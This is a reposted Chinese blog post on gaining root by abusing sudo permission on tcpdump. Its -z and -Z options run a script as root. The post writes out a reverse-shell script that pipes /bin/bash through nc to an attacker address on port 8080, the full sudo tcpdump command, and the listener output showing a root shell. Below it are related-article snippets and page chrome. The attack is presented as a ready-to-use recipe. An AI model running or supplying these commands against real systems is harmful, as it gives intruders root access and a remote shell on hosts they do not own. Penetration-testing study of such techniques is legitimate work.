sudo-tcpdump提权法

最新推荐文章于 2024-05-24 17:09:35 发布
最新推荐文章于 2024-05-24 17:09:35 发布
阅读量554 收藏
点赞数
文章标签: shell
原文链接:http://www.cnblogs.com/zlgxzswjy/p/10346043.html
版权

当当前用户可以通过sudo执行tcpdump时,可以用来进行提权

tcpdump中有两个参数-z和-Z,前者用来执行一个脚本,后者用来指定tcpdump以哪个用户运行,当可以通过sudo执行时,则可以指定以root用户运行一个脚本,从而达到提权的目的

一、编写反向shell脚本

#shell.sh

mknod backpipe p && nc attackerip 8080 0<backpipe | /bin/bash 1>backpipe

二、通过sudo调用tcpdump来执行shell.sh这个脚本

[test@localhost tmp]$ sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root
tcpdump: listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
Maximum file limit reached: 1
1 packet captured
6 packets received by filter
0 packets dropped by kernel
[fireman@localhost tmp]$

三、在接收端可以看到已经得到了一个反向shell

root@kali:~/# nc -lvnp 8080
listening on [any] 8080 ...
connect to [192.168.109.216] from (UNKNOWN) [192.168.109.223] 52468
id
uid=0(root) gid=0(root) groups=0(root)

 

转载于:https://www.cnblogs.com/zlgxzswjy/p/10346043.html

weixin_30621711
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
tcpdump
lyyslsw的专栏
12-30 1197
linux 普通用户默认是没有权限使用tcpdump的, 所以需要root 用户赋权: root# setcap cap_net_raw=eip /usr/sbin/tcpdump 不要为普通用户添加tcpdump的sudo权限, zhangsan ALL=(root) NOPASSWD: /usr/bin/awk, /usr/bin/less /tmp/abc.text, /us...
vulnhub - webdeveloper考点:(信息搜集&wireshark&wordpress漏洞&linux tcpdump权)
冬萍子癸水
04-23 317
https://www.vulnhub.com/entry/web-developer-1,288/ nat网络 arp-scan -l 比平常多出来的ip就是靶机了。。 nmap看到80,22 80当然是web里搜集信息,22要想到可能会ssh登录。。 进去看到是WordPress博客,要想到wpscan扫它,扫出了用户,不过没有太亮眼的其他发现。 dirbuster之类的扫目录,发现登录框。。...
渗透测试:Linux权精讲(四(1),2024腾讯软件测试面试题精选
2401_83621499的博客
04-11 874
本文介绍了19种常见的sudo权方式,主要还是利用了系统对可执行文件/工具的高权限配置,使得低权限的用户(初始靶机shell)能够以root权限sudo免密执行高权限的指令。相信通过本文的介绍,希望读者能够对权的本质:低权限用户因为某种原因(配置/漏洞)能够运行高权限的指令/工具/脚本,有更为直观的理解。最后决定还是将本文的19种权方式强行来一个简要的分类,纯属个人理解,如果有总结不到位的地方还请读者多多指出。
Linux SUID
柠檬木有枝
01-27 4812
文章目录0x00 前言0x01 关于 SUID1.1 /etc/sudoers 语法1.2 查找具有 SUID 权限位文件0x02 常用权方式2.1 nmap2.2 find2.3 vi/vim2.4 bash2.5 less2.6 more2.7 cp2.8 mv2.9 nano2.10 awk2.11 man2.12 wget2.13 apache2.14 tcpdump2.15 pytho...
Linux-suid
liver100day的博客
11-16 1310
ww
vulnhub - /symfonos-3 (考点:shellshock & tcpdump /cap & linux修改py权)
冬萍子癸水
04-26 812
https://www.vulnhub.com/entry/symfonos-3,332/ nat网络 arp-scan -l 扫出多的那个IP就是靶机 nmap 21想到ftp进去找文件,pro这个1,3 5 版本有漏洞,这个靶机系列的上一台有,joy靶机也有。之前都讲了 22想到可能ssh登录 80web搜集信息 PORT STATE SERVICE VERSION 21/tcp o...
linux sudo -i 参数,Linux系统中su、sudo、sudo su、sudo -i命令的用法和区别小结
weixin_30923447的博客
05-12 5562
在Linux系统软件中,因为root的权限过大,一般状况也不应用它。只能在一些独特状况下能选用登陆root实行管理方法每日任务,一般状况下临时性应用root权限多选用su和sudo命令。su命令就是说切换用户的专用工具,如何了解呢?例如人们以一般用户tom登陆的,但是加上用户每日任务,实行useradd ,tom用户沒有这一权限,而这一权限刚好由root所有着。解决方案没法有2个,一是撤出tom用...
sudo 命令_su、sudo、sudo su、sudo -i的用法和区别
热门推荐
qq_43842093的博客
05-22 1万+
sudo 命令 1、sudo 简介 sudo是linux系统管理指令,是允许系统管理员让普通用户执行一些或者全部的root命令的一个工具,如halt,reboot,su等等。这样不仅减少了root用户的登录 和管理时间,同样也高了安全性。sudo不是对shell的一个代替,它是面向每个命令的。(百度百科) su 命令 su是最简单的身份切换命令,一般都是su - username,然后输入password就ok了,root用su至其他用户无须密码;但非root用户切换时需要密码。切换到root可以使用su
sudo-1.9.12p1 rpm安装包
11-08
sudo-1.9.12p1 rpm安装包,适用于centos8
sudo-1.9.5p2-1.el6.x86_64.rpm
02-04
基于sudo 1.9.5p2源码编译打包,用以解决Sudo 堆溢出(CVE-2021-3156)漏洞,已再rhel6.5及centos6.5上安装验证,直接使用rpm -Uvh升级安装即可
centos7-sudo-1.9.9.rpm包。修复CVE-2021-3156,Sudo堆缓冲区溢出漏洞
01-30
此为centos7版的最新sudo-1.9.9.rpm包,修复修复CVE-2021-3156漏洞。 升级步骤: 1、将RPM包上传到服务器上, 2、执行升级命令: # rpm -Uvh sudo-1.9.9-1.el7.x86_64.rpm 3、执行完毕后,查询sudo版本: # sudo -V
sudo-1.8.23-10.el7_9.1.x86_64.rpm
12-26
官方离线安装包,亲测可用。使用rpm -ivh [rpm完整包名] 进行安装
sudo-1.9.8-3.el7.x86_64.rpm
12-31
CentOS 7 sudo升级包,版本1.9.8.3
shell脚本条件语句和循环语句
最新发布
xiaogengtongxu的博客
05-24 827
条件测试:判断某需求是否满足,需要由测试机制来实现,专用的测试表达式需要由测试命令辅助完成。两者最大的不同点: 用( )执行多条程序时,会开启字shell,即在新的bash环境下,而{ }则是在当前bash环境下。until循环和while循环类似,但区别在于while循环在条件为真时继续执行循环,而until则是在条件为假时执行循环。while循环一般用于有条件判断的循环,若判断条件为真,则进入循环,当然条件为假就跳出循环。-d 你描述的日期,显示指定字符串所描述的时间,而非当前时间。
阿里云手机adb远程连接出现adb问题unauthorized解决
云霄IT的博客
05-24 189
执行adb shell出现下面错误。解决:导入和绑定adb的密钥。
集成构建流程之根文件系统Buidroot
gaoyang3513的博客
05-23 155
执行make,Makefile文件为:build/Makefile。通用编译脚本:build.sh。通用shell函数定义脚本。通用环境变量配置脚本。
adb获取包名和界面名
qq1120443486的博客
05-24 282
当我们打开设置时,包名与界面名变成了com.android.settings/.Settings t2。这个是在当前手机打开哪个界面获取的就是哪个界面的包名与界面。注意第一次连接时会有示,需要连接两次才可以。
shell脚本
专注
05-21 882
1、介绍1、介绍shell是一个命令行解释器,用于与Linux系统交互,获得与程序相关的信息,是一系列linux命令的组合。2、命令2.1、echo用来将一段文本输出到终端或者重定向到文件中。用于查看当前用户在命令行中执行过的命令历史记录。该命令允许用户查看、搜索、编辑和执行之前执行过的命令。alias用来创建或查看命令的别名。别名是已经存在的命令的一个替代或缩写,可以简化命令行操作,高工作效率。创建别名:alias 别名="命令"删除别名:alias -d 别名。
描述sudo -s和sudo -i的区别
04-11
sudo -s和sudo -i都是用于以超级用户身份运行命令的sudo命令的选项。它们之间的区别如下: 1. sudo -s:该选项允许用户以超级用户(root)的身份启动一个新的shell。这个新的shell会继承当前用户的环境变量,并且用户可以在这个shell中执行需要超级用户权限的命令。但是,sudo -s并不会改变当前用户的工作目录。 2. sudo -i:该选项也允许用户以超级用户身份启动一个新的shell,但是与sudo -s不同的是,sudo -i会将当前用户的环境变量完全替换为超级用户的环境变量,并且会将当前用户的工作目录切换到超级用户的主目录(即root用户的主目录)。 总结一下: - sudo -s启动一个新的shell,继承当前用户的环境变量,但不改变工作目录。 - sudo -i启动一个新的shell,完全替换当前用户的环境变量,并切换到超级用户的主目录。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值